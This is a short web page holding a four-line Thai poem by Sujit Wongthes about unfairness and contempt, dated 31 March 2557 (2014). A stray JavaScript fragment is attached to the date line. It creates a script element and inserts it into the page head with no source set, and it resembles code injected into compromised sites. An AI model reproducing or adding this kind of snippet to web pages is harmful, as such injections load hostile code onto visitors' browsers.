Download PDF

ยิ่งไม่เป็นธรรมไร้มาตรฐาน

ยิ่งผลักไสคนบ้านบ้านห้าวหาญสู้

ยิ่งอยู่สูงยิ่งสั่นหนาวพรั่นพรู

ยิ่งเหยียดหยามก็ยิ่งอยู่กันยากเย็น

 

สุจิตต์ วงษ์เทศ

จันทร์ 31 มีนาคม 2557var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);